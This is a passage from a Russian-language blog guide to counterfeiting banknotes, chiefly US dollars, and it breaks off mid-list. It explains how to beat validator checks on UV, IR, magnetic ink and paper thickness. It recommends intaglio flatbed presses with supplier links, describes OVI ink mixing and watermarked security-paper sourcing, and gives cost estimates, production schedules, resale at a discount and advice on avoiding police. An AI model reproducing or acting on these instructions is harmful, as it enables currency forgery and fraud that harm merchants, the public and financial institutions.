  &lt;h3 id=&quot;U2nV&quot;&gt;4. Спецэлемент «М»&lt;/h3&gt;
  &lt;p id=&quot;XqkJ&quot;&gt;Этот элемент можно увидеть &lt;strong&gt;в детекторах банкнот&lt;/strong&gt;, которые поддерживают &lt;strong&gt;ИК-подсветку в двух диапазонах длин волн&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;0Atc&quot;&gt;&lt;em&gt;&amp;quot;При переключении подсветки между 940 нм и 850 нм на экране появляется характерное «мерцание» защитного элемента.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;0sTM&quot;&gt;&lt;strong&gt;Этот метод детекции легко автоматизируется&lt;/strong&gt; и встречается в большинстве &lt;strong&gt;автоматических валидаторов&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;zt12&quot;&gt;5. Детекция толщины бумаги&lt;/h3&gt;
  &lt;p id=&quot;KUVH&quot;&gt;Некоторые валидаторы &lt;strong&gt;(например, CashCode)&lt;/strong&gt; используют &lt;strong&gt;анализ толщины бумаги&lt;/strong&gt; для проверки &lt;strong&gt;водяного знака&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;QFiq&quot;&gt;&lt;em&gt;&amp;quot;Этот метод основан на локальном утолщении или утоньшении бумаги, что легко фиксируется валидатором.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;I5Eu&quot;&gt;Такой метод сложнее обойти, но &lt;strong&gt;правильное изготовление водяных знаков&lt;/strong&gt; решает проблему.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;p id=&quot;WoPP&quot;&gt;Элементы разобрали, теперь решаем проблемы с их детекцией по мере поступления:&lt;/p&gt;
  &lt;h3 id=&quot;W825&quot;&gt;&lt;strong&gt;1. Отсутствие фонового УФ-свечения&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;KqVD&quot;&gt;Этот вопрос был &lt;strong&gt;закрыт на этапе изготовления бумаги&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;uwcb&quot;&gt;Многие &amp;quot;умельцы&amp;quot; из программы &lt;strong&gt;&amp;quot;Очумелые ручки&amp;quot;&lt;/strong&gt; пытаются решить проблему, &lt;strong&gt;пропитывая офисную бумагу (например, &amp;quot;Снегурочку&amp;quot;) средствами от загара&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;dG8m&quot;&gt;&lt;em&gt;&amp;quot;На мой взгляд, это в корне неправильно – лучше не создавать проблему, чтобы потом не пришлось ее решать.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h4 id=&quot;JHke&quot;&gt;&lt;strong&gt;2-3. Металлографическая печать и магнитные чернила&lt;/strong&gt;&lt;/h4&gt;
  &lt;p id=&quot;0r9n&quot;&gt;Этот пункт разберем ниже при объяснении &lt;strong&gt;принципа металлографической печати&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h4 id=&quot;xZB1&quot;&gt;&lt;strong&gt;4. Спецэлемент «М»&lt;/strong&gt;&lt;/h4&gt;
  &lt;p id=&quot;iSrq&quot;&gt;Этот защитный элемент &lt;strong&gt;сложный, но решаемый&lt;/strong&gt; – зная состав краски, можно воспроизвести эффект.&lt;/p&gt;
  &lt;blockquote id=&quot;cUpm&quot;&gt;&lt;em&gt;&amp;quot;Но такое ноу-хау обойдется недешево. Оговорюсь, что рецепт – есть.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;YtWW&quot;&gt;Почему нельзя использовать обычные принтеры?&lt;/h3&gt;
  &lt;p id=&quot;X8HS&quot;&gt;Я уже объяснял, почему &lt;strong&gt;мы не можем&lt;/strong&gt; использовать даже &lt;strong&gt;самые продвинутые принтеры и офсетные машины&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;e3GY&quot;&gt;&lt;strong&gt;Технический прогресс ушел далеко:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;C1Pm&quot;&gt;
    &lt;li id=&quot;QWNI&quot;&gt;Почти в каждом доме стоит &lt;strong&gt;струйный принтер или МФУ&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;yzfx&quot;&gt;Те, кто побогаче, покупают &lt;strong&gt;лазерные принтеры&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;JuHd&quot;&gt;Можно даже завести &lt;strong&gt;ризограф&lt;/strong&gt; или &lt;strong&gt;одноцветный офсет с фотонаборным принтером&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;NJOD&quot;&gt;Но проблема не в том, что их трудно достать. Проблема в &lt;strong&gt;типе печати&lt;/strong&gt;:&lt;/p&gt;
  &lt;blockquote id=&quot;QGFZ&quot;&gt;&lt;em&gt;&amp;quot;Все эти технологии – от принтеров и копиров до ризографов и офсета – имеют один и тот же недостаток: растровая структура.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;sDBc&quot;&gt;Если увеличить изображение, то даже у самых дорогих аппаратов оно будет выглядеть &lt;strong&gt;как набор точек&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;PCXC&quot;&gt;&lt;strong&gt;Как банкноты печатаются в реальности?&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;t7ZO&quot;&gt;Все банкноты печатаются специфическими методами:&lt;/p&gt;
  &lt;ul id=&quot;h2hE&quot;&gt;
    &lt;li id=&quot;mITd&quot;&gt;&lt;strong&gt;Глубокая печать (металлография)&lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;Ya80&quot;&gt;&lt;strong&gt;Орловская печать&lt;/strong&gt;&lt;/li&gt;
    &lt;li id=&quot;1OAq&quot;&gt;&lt;strong&gt;Ирисовый раскат&lt;/strong&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;C5AV&quot;&gt;Эти технологии &lt;strong&gt;контролируются государством&lt;/strong&gt;. Купить такое оборудование &lt;strong&gt;без лицензии невозможно&lt;/strong&gt;, даже имея &lt;strong&gt;10 миллионов долларов&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;0yVG&quot;&gt;В открытых источниках методы печати &lt;strong&gt;описаны расплывчато&lt;/strong&gt;. Единственное, что можно сказать точно:&lt;/p&gt;
  &lt;ul id=&quot;qfsG&quot;&gt;
    &lt;li id=&quot;DiUP&quot;&gt;Они хороши &lt;strong&gt;для больших тиражей&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;QI2t&quot;&gt;Их почти &lt;strong&gt;не используют для малых партий&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;ZC4Z&quot;&gt;&lt;em&gt;&amp;quot;Орловская печать и ирисовый раскат нам не интересны – мы не будем печатать классический полноцвет.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;h3 id=&quot;rVpN&quot;&gt;&lt;strong&gt;Какой метод нам подходит?&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;tWT2&quot;&gt;Мы используем &lt;strong&gt;псевдоцветную печать&lt;/strong&gt;, где:&lt;/p&gt;
  &lt;ul id=&quot;nNdc&quot;&gt;
    &lt;li id=&quot;dMhM&quot;&gt;&lt;strong&gt;Магнитная и немагнитная пары&lt;/strong&gt; заменяют обычные краски.&lt;/li&gt;
    &lt;li id=&quot;XJfb&quot;&gt;&lt;strong&gt;ИК-метамерная пара&lt;/strong&gt; создает нужный инфракрасный эффект.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;O1LZ&quot;&gt;&lt;em&gt;&amp;quot;Еще одна важная особенность долларов – их особенная тактильная текстура, которую невозможно реализовать ни струйными, ни лазерными принтерами, ни офсетом.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;xoPf&quot;&gt;Единственный вариант – &lt;strong&gt;металлография&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;US1A&quot;&gt;Но &lt;strong&gt;нам не нужен промышленный ротационный станок&lt;/strong&gt;, который печатает &lt;strong&gt;32 купюры за один оборот&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;TQni&quot;&gt;Также &lt;strong&gt;не подойдет тигельный пресс&lt;/strong&gt; – усилие прижима там &lt;strong&gt;тонны на квадратный сантиметр&lt;/strong&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;F5jx&quot;&gt;&lt;strong&gt;Наш выбор – металлография с плоским талером&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;e2vW&quot;&gt;Нам нужен &lt;strong&gt;печатный станок&lt;/strong&gt;, в котором:&lt;/p&gt;
  &lt;ul id=&quot;aoEM&quot;&gt;
    &lt;li id=&quot;lNwI&quot;&gt;На &lt;strong&gt;плоском талере&lt;/strong&gt; закреплена &lt;strong&gt;печатная форма глубокой печати (металлическое клише)&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;YKur&quot;&gt;Декель прижимает изображение &lt;strong&gt;через цилиндр&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;GZOu&quot;&gt;&lt;em&gt;&amp;quot;Такие станки продаются, цена – от нескольких тысяч до десятков тысяч долларов, в зависимости от формата и автоматизации.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;hDL4&quot;&gt;Пример можно найти &lt;strong&gt;здесь&lt;/strong&gt;: 🔗 &lt;a href=&quot;https://shop.takachpress.com/takach-presses/&quot; target=&quot;_blank&quot;&gt;Takach Press&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;1eoF&quot;&gt;Здесь же можно найти так же &lt;strong&gt;декельное сукно &lt;/strong&gt;и компоненты для создания красок. Но почему делать краску нужно самому, если можно купить готовую? Всё просто — даже &lt;strong&gt;ФРС США изготавливает краски самостоятельно&lt;/strong&gt;. Никто не предложит вам &lt;strong&gt;ИК-метамерную пару, OVI с нужным цветом или спецэлемент М&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;Q3VS&quot;&gt;В крайнем случае можно раздобыть &lt;strong&gt;магнитную и немагнитную черную краску&lt;/strong&gt;, но её одной будет мало. Также понадобится &lt;strong&gt;ракель&lt;/strong&gt; — стальная пластина-нож, удаляющая излишки краски с пробельных элементов клише.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;dEss&quot;&gt;&lt;strong&gt;Металлическое клише: ключевой элемент&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;O9g1&quot;&gt;Вот здесь на сцену выходит &lt;strong&gt;гравированное металлическое клише&lt;/strong&gt;, созданное алмазной иглой.&lt;/p&gt;
  &lt;blockquote id=&quot;ALdq&quot;&gt;То самое, за которым в боевиках охотятся мафиози и которое стоит баснословных денег...&lt;/blockquote&gt;
  &lt;p id=&quot;ZuSn&quot;&gt;В тонкости его производства вдаваться не будем — эта тема потребует отдельной статьи. Желающим сделать клише самостоятельно придётся потратить &lt;strong&gt;годы&lt;/strong&gt; на подбор оборудования, создание векторных рисунков и десятки тысяч долларов на сам процесс.&lt;/p&gt;
  &lt;p id=&quot;yH1T&quot;&gt;На этом клише выгравированы &lt;strong&gt;все элементы изображения&lt;/strong&gt;, включая магнитные и немагнитные участки, OVI-надпечаток и полный рисунок обратной стороны &lt;strong&gt;без разбиения на ИК-метамерные краски&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;Lb4P&quot;&gt;Краски наносятся последовательно с помощью &lt;strong&gt;контрматриц&lt;/strong&gt;, каждая из которых отвечает за свою часть изображения. Есть отдельные контрматрицы для магнитных и немагнитных чернил, OVI на лицевой стороне, а также для ИК-поглощающих и отражающих областей на обратной стороне.&lt;/p&gt;
  &lt;p id=&quot;63pi&quot;&gt;После нанесения всех красок стальной &lt;strong&gt;ракель&lt;/strong&gt; удаляет излишки с пробельных элементов. Затем на клише укладывается лист бумаги, и в один проход печатается вся сторона купюры. Сначала печатается обратная сторона, а затем лицевая — так сохраняется тактильный рельеф и &lt;strong&gt;пресловутый &amp;quot;шершавый пиджак Франклина&amp;quot;&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;re4q&quot;&gt;И вот, когда ты держишь в руках готовый лист, ты сам убедишься — &lt;strong&gt;никаких «совмещений» красок не потребуется&lt;/strong&gt;. Изображение выходит &lt;strong&gt;плотным, четким&lt;/strong&gt;, с теми самыми &lt;strong&gt;«поплывами» краски&lt;/strong&gt;, которые бывают только при &lt;strong&gt;глубокой печати&lt;/strong&gt;. Эти характерные &lt;strong&gt;нерегулярные потеки&lt;/strong&gt; — не дефект, а признак оригинальной технологии, который сделает идентификацию твоего творения &lt;strong&gt;на порядок сложнее&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;5tvf&quot;&gt;Что касается оборудования, то в теории можно взглянуть на &lt;strong&gt;самодельные плоскопечатные машины&lt;/strong&gt;. Один из вариантов — &lt;strong&gt;плоскопечатная машина с пневмоприводом декельного вала и ракеля&lt;/strong&gt;, с &lt;strong&gt;ручным нанесением краски&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;ZLa7&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d2/d4/d2d496c6-7469-4a1e-be42-2225ff38ac00.png&quot; width=&quot;2104&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wmWC&quot;&gt;Однако для старта куда разумнее выбрать &lt;strong&gt;модель попроще&lt;/strong&gt;: с клише &lt;strong&gt;на одну позицию&lt;/strong&gt;, с &lt;strong&gt;ручным прижимом декели и механическим приводом стола&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;py1O&quot;&gt;Теперь о номерах и печати казначейства. Они идут &lt;strong&gt;отдельно&lt;/strong&gt; и выполняются &lt;strong&gt;высокой печатью&lt;/strong&gt; — той самой, которая позволяет реализовать &lt;strong&gt;спецэлемент М&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;bO5F&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/38/ab/38ab94a2-abbd-4b04-871e-e7c7ae444081.png&quot; width=&quot;1510&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SC19&quot;&gt;Конечно, можно попытаться сэкономить и &lt;strong&gt;напечатать номера на принтере&lt;/strong&gt;, но тогда не обессудь — &lt;strong&gt;это слабое звено&lt;/strong&gt;, которое &lt;strong&gt;может обнулить все труды&lt;/strong&gt; и оставить тебя без тачек, без телочек, да еще и с перспективой долгого созерцания горизонта из окна в мордовских лесах.&lt;/p&gt;
  &lt;p id=&quot;Jgf4&quot;&gt;Совсем забыл про &lt;strong&gt;OVI-краску&lt;/strong&gt;. Разумеется, здесь &lt;strong&gt;никаких готовых решений в продаже не найти&lt;/strong&gt; — пигменты закупаются в Китае, и путем тщательного смешивания &lt;strong&gt;двух пигментов с концентрацией более 20%&lt;/strong&gt; получается тот самый эффект. Наносить его можно &lt;strong&gt;прямо на комплексное лицевое клише&lt;/strong&gt;, в один проход с магнитной и немагнитной красками. Если вдруг ты &lt;strong&gt;по каким-то религиозным убеждениям боишься мешать мясо с молоком&lt;/strong&gt;, то можно пойти обходным путем — сначала напечатать магнитные и немагнитные элементы, а уже после высыхания &lt;strong&gt;наносить OVI&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;jWRY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2b/bd/2bbd7187-40c3-4597-98cd-cda63d161026.png&quot; width=&quot;1510&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;1qaC&quot;&gt;Только будь готов к проблеме: &lt;strong&gt;второй слой краски загладит рельеф пиджака&lt;/strong&gt;, и тогда придется использовать либо &lt;strong&gt;шелкографию&lt;/strong&gt;, либо &lt;strong&gt;высокую печать&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;Ieo3&quot;&gt;Ну и последний этап — &lt;strong&gt;порезка&lt;/strong&gt;. Тут забудь про ножницы. Даже если у тебя руки хирурга, последний раз напрягись и &lt;strong&gt;возьми нормальный гильотинный резак&lt;/strong&gt;, как минимум &lt;strong&gt;на 100 листов&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;6FNk&quot;&gt;Вот и все. Прочитав это, ты уже понял главное: &lt;strong&gt;качественные фальшивки не могут стоить 50% от номинала&lt;/strong&gt;. Если кто-то предлагает их по такой цене, то перед тобой либо &lt;strong&gt;скам&lt;/strong&gt;, либо &lt;strong&gt;примитивная принтерная подделка&lt;/strong&gt;.&lt;/p&gt;
  &lt;section&gt;
    &lt;h2 id=&quot;T0QW&quot;&gt;4. Окупаемость и затраты на старт&lt;/h2&gt;
  &lt;/section&gt;
  &lt;figure id=&quot;Am02&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ac/c0/acc0ec4c-0af1-42a3-9c7e-d741098131f3.png&quot; width=&quot;1816&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PUjx&quot;&gt;Небольшие &lt;strong&gt;прикидки по финансам&lt;/strong&gt;, которые помогут понять, &lt;strong&gt;во сколько обходится вход в этот бизнес&lt;/strong&gt; и почему &lt;strong&gt;все публичные «магазины» по продаже фальша — это 99% скам&lt;/strong&gt;. Оставлю 1% на &lt;strong&gt;экстравертов-альтруистов&lt;/strong&gt;, которые, видимо, просто хотят помочь вам заработать &lt;strong&gt;первый лям долларов&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;F4pz&quot;&gt;&lt;strong&gt;Постановка целей и реальность затрат&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;D6Mw&quot;&gt;Любой &lt;strong&gt;бизнес начинается с бизнес-плана&lt;/strong&gt;, а бизнес-план — с &lt;strong&gt;цели&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;uLpr&quot;&gt;Если твоя &lt;strong&gt;цель — заработать на тачку&lt;/strong&gt;, можешь &lt;strong&gt;закрывать эту статью прямо сейчас&lt;/strong&gt;. Стартовые затраты &lt;strong&gt;превысят стоимость не одной премиальной машины&lt;/strong&gt;, и если ты думаешь сэкономить и начать с &lt;strong&gt;парочки соток рублей&lt;/strong&gt;, то с вероятностью &lt;strong&gt;100% тебя закроют в первую неделю работы&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;4jcZ&quot;&gt;Второй принцип — &lt;strong&gt;не жадничай&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;ZyIu&quot;&gt;&lt;em&gt;&amp;quot;Заработал на цель? Ложись на дно. Уходи на пенсию. Диверсифицируй бизнес. Потому что тебя будут искать. Усердно искать.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;UueX&quot;&gt;Теперь &lt;strong&gt;разбираем реальную цель&lt;/strong&gt;. Допустим, хочется &lt;strong&gt;виллу, яхту, 10 лет безбедной жизни&lt;/strong&gt;. Но не работать на все это &lt;strong&gt;до пенсии&lt;/strong&gt;, а закрыть вопрос &lt;strong&gt;за год упорного труда&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;0VQc&quot;&gt;Для этого понадобится &lt;strong&gt;$5M&lt;/strong&gt;. Это &lt;strong&gt;не на команду&lt;/strong&gt;, это &lt;strong&gt;«в одно рыло»&lt;/strong&gt;. С учетом &lt;strong&gt;50% дисконта при сбыте&lt;/strong&gt;, значит, печатать придется &lt;strong&gt;$10M&lt;/strong&gt;.&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;AmLq&quot;&gt;&lt;strong&gt;Сколько времени займет производство?&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;IA68&quot;&gt;Печатать &lt;strong&gt;ты не начнешь с первого дня&lt;/strong&gt;.&lt;/p&gt;
  &lt;ul id=&quot;W5r7&quot;&gt;
    &lt;li id=&quot;Xz6U&quot;&gt;&lt;strong&gt;На подготовку&lt;/strong&gt; уйдет &lt;strong&gt;не меньше 6 месяцев&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;8IpR&quot;&gt;&lt;strong&gt;На производство&lt;/strong&gt; — еще &lt;strong&gt;6 месяцев&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;XWOn&quot;&gt;Теперь по цифрам. Расчеты показывают &lt;strong&gt;1 800 часов напряженной работы&lt;/strong&gt; на изготовление &lt;strong&gt;25 000 листов A4&lt;/strong&gt;, где &lt;strong&gt;4 изделия на лист&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;Lpuu&quot;&gt;Это значит, что ты &lt;strong&gt;должен делать по листу A4 каждые 4 минуты&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;dSl3&quot;&gt;&lt;em&gt;&amp;quot;Кажется, слишком быстро? При правильной организации — вполне реально. Несколько дней только на бумагу, потом только на печать, затем нумерация, резка и так далее. Главное — не смешивать процессы, иначе утонешь.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;Xlm9&quot;&gt;Звучит как &lt;strong&gt;каторжный труд&lt;/strong&gt;? Так и есть! Можно взять помощников, но тут есть нюансы в плане прибыли и безопасности...&lt;/p&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;Nvqi&quot;&gt;&lt;strong&gt;Бумага — 90% успеха&lt;/strong&gt;&lt;/h3&gt;
  &lt;blockquote id=&quot;i56B&quot;&gt;&lt;em&gt;&amp;quot;Можешь придумать идеальный способ печати, но если бумага не та — всё остальное не имеет смысла.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;9OxO&quot;&gt;Почему? Потому что &lt;strong&gt;люди, валидаторы и спецоборудование в первую очередь проверяют&lt;/strong&gt;:&lt;/p&gt;
  &lt;ul id=&quot;jSkA&quot;&gt;
    &lt;li id=&quot;Pago&quot;&gt;&lt;strong&gt;Тактильные признаки&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;GVda&quot;&gt;&lt;strong&gt;Визуальные маркеры&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;3eZZ&quot;&gt;&lt;strong&gt;Машиночитаемые элементы&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;tW6d&quot;&gt;Но &lt;strong&gt;в последние годы китайские друзья сильно облегчили жизнь&lt;/strong&gt;. Теперь можно купить &lt;a href=&quot;https://www.alibaba.com/product-detail/100-Cotton-A4-Security-Thread-Paper_1601204571687.html?spm=a27aq.26625037.1326427270.17.58c33ed0SKXwsn&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;заготовки под нужные купюры&lt;/strong&gt; по &lt;strong&gt;вполне вменяемым ценам&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;z70Z&quot;&gt;Что в них есть:&lt;/p&gt;
  &lt;ul id=&quot;mbrB&quot;&gt;
    &lt;li id=&quot;MMD2&quot;&gt;&lt;strong&gt;Нет фонового УФ-свечения&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;STXC&quot;&gt;&lt;strong&gt;Не реагируют на химический карандаш&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;ysct&quot;&gt;&lt;strong&gt;Внедренные цветные нити&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;larI&quot;&gt;Можно даже &lt;strong&gt;заказать защитную ленту&lt;/strong&gt;, но &lt;strong&gt;с печатью на ней я бы уже постеснялся экспериментировать&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;zkmB&quot;&gt;&lt;em&gt;&amp;quot;В этом деле нет серебряной пули — есть компромиссы. Ты либо выбираешь скорость, либо качество.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;tbSF&quot;&gt;&lt;strong&gt;Первый вариант: быстро и дешево&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;ODcp&quot;&gt;Идея проста: &lt;strong&gt;печатать &lt;a href=&quot;https://www.alibaba.com/product-detail/Ceres-Watermark-Ink-For-Screen-Printing_62222599976.html?spm=a2700.galleryofferlist.p_offer.d_title.35d413a0TmIqfG&amp;s=p&quot; target=&quot;_blank&quot;&gt;ВЗ специальной краской&lt;/a&gt;&lt;/strong&gt;. Это бюджетный путь, где краска стоит &lt;strong&gt;около 100 USD за кг&lt;/strong&gt;, а &lt;strong&gt;бумагу с внедренной лентой&lt;/strong&gt; можно заказать &lt;strong&gt;по цене от 0.05 до 1.0 USD за лист&lt;/strong&gt;. Итоговые затраты:&lt;/p&gt;
  &lt;ul id=&quot;gwbx&quot;&gt;
    &lt;li id=&quot;IDfB&quot;&gt;&lt;strong&gt;10 кг краски — 1000 USD&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;eTyk&quot;&gt;&lt;strong&gt;25 000 листов бумаги — 15 000 USD&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;EFep&quot;&gt;&lt;strong&gt;Дополнительные расходы — около 4 000 USD&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;blockquote id=&quot;u5vs&quot;&gt;&lt;strong&gt;ВСЕГО: ~20 000 USD&lt;/strong&gt; (с учетом доставки, мелочей и непредвиденных трат).&lt;/blockquote&gt;
  &lt;p id=&quot;fzPw&quot;&gt;Быстро, недорого, но есть &lt;strong&gt;один нюанс&lt;/strong&gt; — &lt;strong&gt;валидаторы, которые проверяют толщину бумаги, сразу определят подделку&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;eYHo&quot;&gt;Если &lt;strong&gt;главный рынок сбыта — наличный оборот&lt;/strong&gt;, особенно российские рубли, &lt;strong&gt;это вариант подойдет&lt;/strong&gt;. Однако &lt;strong&gt;с USD&lt;/strong&gt; без текста на ленте будет сложнее — даже вручную сбыть такие изделия проблематично.&lt;/p&gt;
  &lt;p id=&quot;umN9&quot;&gt;&lt;strong&gt;Что потребуется по оборудованию?&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;evdc&quot;&gt;
    &lt;li id=&quot;SLji&quot;&gt;&lt;strong&gt;Станок для УФ-засветки&lt;/strong&gt;, рамки с сетками, лазерный принтер для фотоформ с ВЗ, фотоэмульсия, пленки, контрастер, ракели, кюветы и прочая мелочевка — ~500 USD.&lt;/li&gt;
    &lt;li id=&quot;Ehp1&quot;&gt;&lt;strong&gt;Шелкотрафаретный станок&lt;/strong&gt; — от &lt;strong&gt;200–300 USD за ручной&lt;/strong&gt; до &lt;strong&gt;5000 USD за полуавтомат&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Tu8D&quot;&gt;Этот вариант позволяет &lt;strong&gt;завершить производство бумаги за месяц&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;OkV2&quot;&gt;&lt;em&gt;&amp;quot;Но если мечта — не рубли, а настоящие хрустящие баксы, придется идти дальше.&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;hr /&gt;
  &lt;h3 id=&quot;Ogjc&quot;&gt;&lt;strong&gt;Второй вариант: сложно, дорого, но бескомпромиссно&lt;/strong&gt;&lt;/h3&gt;
  &lt;p id=&quot;8UQS&quot;&gt;Здесь уже используется &lt;strong&gt;склейка двуслойной бумаги, полноценное внедрение водяных знаков и лент&lt;/strong&gt;. Такой подход подходит &lt;strong&gt;для долларов, евро и рублей&lt;/strong&gt;, и, что главное, &lt;strong&gt;проходит валидаторы и банкоматы&lt;/strong&gt;.&lt;/p&gt;
  &lt;blockquote id=&quot;5eIW&quot;&gt;&lt;em&gt;&amp;quot;Это уже не кустарщина, а проект уровня «чемодан в банк».&amp;quot;&lt;/em&gt;&lt;/blockquote&gt;
  &lt;p id=&quot;TtlK&quot;&gt;Что нужно:&lt;/p&gt;
  &lt;ul id=&quot;rXUv&quot;&gt;
    &lt;li id=&quot;7LLh&quot;&gt;&lt;strong&gt;Отливная машина для ВЗ&lt;/strong&gt; — ~10 000 USD.&lt;/li&gt;
    &lt;li id=&quot;rwjJ&quot;&gt;&lt;strong&gt;Полуавтоматическая оснастка для склеивания листов&lt;/strong&gt; — ~1500 USD, или &lt;strong&gt;вакуумный пресс&lt;/strong&gt; — ~12 000 USD.&lt;/li&gt;
    &lt;li id=&quot;lO8I&quot;&gt;&lt;strong&gt;Барабанная сушилка&lt;/strong&gt; — ~5000 USD.&lt;/li&gt;
    &lt;li id=&quot;GZ42&quot;&gt;&lt;strong&gt;Тонкая бумага 36-38 gsm&lt;/strong&gt; — ~0.35 USD за лист, &lt;strong&gt;50 000 листов = 17 500 USD&lt;/strong&gt;.&lt;/li&gt;
    &lt;li id=&quot;hrN5&quot;&gt;&lt;strong&gt;Измельченная бумажная масса&lt;/strong&gt; — &lt;strong&gt;5 кг за 100 USD&lt;/strong&gt;.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;88mJ&quot;&gt;&lt;strong&gt;Сроки&lt;/strong&gt;&lt;/h3&gt;
  &lt;ul id=&quot;rmoS&quot;&gt;
    &lt;li id=&quot;X5ky&quot;&gt;&lt;strong&gt;Отливка 3125 ВЗ&lt;/strong&gt; — ~2 недели.&lt;/li&gt;
